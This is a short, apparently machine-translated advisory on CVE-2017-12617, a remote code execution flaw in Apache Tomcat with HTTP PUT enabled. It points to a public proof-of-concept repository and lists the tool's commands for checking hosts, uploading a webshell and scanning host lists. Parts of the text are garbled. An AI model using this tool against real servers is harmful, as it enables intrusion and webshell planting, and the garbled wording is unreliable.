cve-2017-12617 Severe Remote Code Execution (RCE) vulnerability found in Apache Tomcat
Affects systems with HTTP put enabled (by setting the default servlet read-only initialization parameter to false). If the default servlet parameter is read-only set to False, or the default servlet is configured, The Tomcat version before 9.0.1 (Beta), 8.5.23,8.0.47, and 7.0.82 contains potentially dangerous remote code execution on all operating systems (RCE) The parameter readonly of the WebDAV servlet is set to False
Poc:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
Usage:
Options:
-u,-url [::] Check that the destination URL is vulnerable
-P,-pwn [::] Generate Webshel L and upload
–l,–list [::] Hosts List
[+] Usage:
./cve-2017-12617.py-u http://127.0.0.1
./cve-2017-12617.py–url http://127.0.0.1
./cve-2017-12617.py-u http://127.0.0.1-p PWN
./cve-2017-12617.py–url Http://127.0.0.1-pwn PWN
./cve-2017-12617.py-l Hotsts.txt
./cve-2017-12617.py–list Hosts.txt
The title test did not change the loophole.